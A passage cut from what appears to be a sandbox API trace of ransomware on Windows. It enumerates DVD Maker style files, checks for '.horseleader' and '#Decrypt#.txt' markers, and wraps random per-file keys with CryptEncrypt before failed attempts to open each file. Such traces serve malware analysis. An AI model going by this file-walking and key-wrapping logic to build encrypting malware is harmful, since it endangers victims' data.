FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xab3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0251.436] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0251.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png") returned 82 [0251.437] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".horseleader") returned 0x0 [0251.437] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.437] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0251.437] lstrlenW (lpString=".testttjffg") returned 11 [0251.437] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png", lpSrch=".testttjffg") returned 0x0 [0251.437] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.437] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.437] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.437] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8a3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0251.437] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0251.437] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png") returned 81 [0251.437] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.437] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.438] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.438] lstrlenW (lpString=".testttjffg") returned 11 [0251.438] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.438] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.438] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.439] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7287ed72, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7287ed72, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-image-mask.png", cAlternateFileName="")) returned 1 [0251.439] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="Windows") returned -1 [0251.439] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 82 [0251.439] StrStrIW (lpFirst="16_9-frame-image-mask.png", lpSrch=".horseleader") returned 0x0 [0251.439] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.439] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="_uninstalling_.png") returned 1 [0251.439] lstrlenW (lpString=".testttjffg") returned 11 [0251.439] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png", lpSrch=".testttjffg") returned 0x0 [0251.439] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.439] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.439] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.440] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72832ab8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72832ab8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4c15, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="babypink.png", cAlternateFileName="")) returned 1 [0251.440] lstrcmpiW (lpString1="babypink.png", lpString2="Windows") returned -1 [0251.440] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 69 [0251.440] StrStrIW (lpFirst="babypink.png", lpSrch=".horseleader") returned 0x0 [0251.440] lstrcmpW (lpString1="babypink.png", lpString2="#Decrypt#.txt") returned 1 [0251.440] lstrcmpW (lpString1="babypink.png", lpString2="_uninstalling_.png") returned 1 [0251.440] lstrlenW (lpString=".testttjffg") returned 11 [0251.440] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png", lpSrch=".testttjffg") returned 0x0 [0251.440] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.440] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.440] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\babygirl\\babypink.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.440] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728a4ecf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728a4ecf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcc1b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="background.png", cAlternateFileName="")) returned 1 [0251.440] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0251.441] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned 71 [0251.441] StrStrIW (lpFirst="background.png", lpSrch=".horseleader") returned 0x0 [0251.441] lstrcmpW (lpString1="background.png", lpString2="#Decrypt#.txt") returned 1 [0251.441] lstrcmpW (lpString1="background.png", lpString2="_uninstalling_.png") returned 1 [0251.441] lstrlenW (lpString=".testttjffg") returned 11 [0251.441] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png", lpSrch=".testttjffg") returned 0x0 [0251.441] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.441] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.441] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\babygirl\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.441] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728cb02c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728cb02c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fe5c4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c432, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="bear_formatted_matte2.wmv", cAlternateFileName="")) returned 1 [0251.441] lstrcmpiW (lpString1="bear_formatted_matte2.wmv", lpString2="Windows") returned -1 [0251.441] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv") returned 82 [0251.441] StrStrIW (lpFirst="bear_formatted_matte2.wmv", lpSrch=".horseleader") returned 0x0 [0251.442] lstrcmpW (lpString1="bear_formatted_matte2.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.442] lstrcmpW (lpString1="bear_formatted_matte2.wmv", lpString2="_uninstalling_.png") returned 1 [0251.442] lstrlenW (lpString=".testttjffg") returned 11 [0251.442] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv", lpSrch=".testttjffg") returned 0x0 [0251.442] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.442] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.442] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.443] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728f1189, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728f1189, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a058069, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c44a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Bear_Formatted_MATTE2_PAL.wmv", cAlternateFileName="")) returned 1 [0251.443] lstrcmpiW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="Windows") returned -1 [0251.443] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 86 [0251.443] StrStrIW (lpFirst="Bear_Formatted_MATTE2_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.443] lstrcmpW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.443] lstrcmpW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.443] lstrlenW (lpString=".testttjffg") returned 11 [0251.443] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.443] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.443] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.444] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729172e6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729172e6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a351bc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39ef2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="bear_formatted_rgb6.wmv", cAlternateFileName="")) returned 1 [0251.444] lstrcmpiW (lpString1="bear_formatted_rgb6.wmv", lpString2="Windows") returned -1 [0251.444] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv") returned 80 [0251.444] StrStrIW (lpFirst="bear_formatted_rgb6.wmv", lpSrch=".horseleader") returned 0x0 [0251.444] lstrcmpW (lpString1="bear_formatted_rgb6.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.444] lstrcmpW (lpString1="bear_formatted_rgb6.wmv", lpString2="_uninstalling_.png") returned 1 [0251.444] lstrlenW (lpString=".testttjffg") returned 11 [0251.444] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv", lpSrch=".testttjffg") returned 0x0 [0251.444] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.444] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.445] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729635a0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729635a0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x41c0a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Bear_Formatted_RGB6_PAL.wmv", cAlternateFileName="")) returned 1 [0251.445] lstrcmpiW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="Windows") returned -1 [0251.445] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 84 [0251.445] StrStrIW (lpFirst="Bear_Formatted_RGB6_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.445] lstrcmpW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.445] lstrcmpW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.445] lstrlenW (lpString=".testttjffg") returned 11 [0251.445] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.445] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.445] CryptEncrypt 
(in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.445] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729af85a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729af85a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdc5, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0251.445] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0251.446] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 76 [0251.446] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.446] lstrcmpW (lpString1="btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.446] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.446] lstrlenW (lpString=".testttjffg") returned 11 [0251.446] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.446] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 
[0251.446] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.447] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729af85a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729af85a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdfc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0251.447] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0251.447] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 76 [0251.447] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".horseleader") returned 0x0 [0251.447] lstrcmpW (lpString1="btn-next-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.447] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0251.448] lstrlenW (lpString=".testttjffg") returned 11 [0251.448] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png", lpSrch=".testttjffg") returned 0x0 [0251.448] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) 
returned 1 [0251.448] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.448] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.448] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xe0b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0251.448] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0251.448] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 80 [0251.448] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".horseleader") returned 0x0 [0251.448] lstrcmpW (lpString1="btn-previous-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.448] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0251.448] lstrlenW (lpString=".testttjffg") returned 11 [0251.448] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png", lpSrch=".testttjffg") returned 0x0 [0251.448] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.448] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.449] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a39de7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0251.449] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0251.449] wnsprintfW (in: 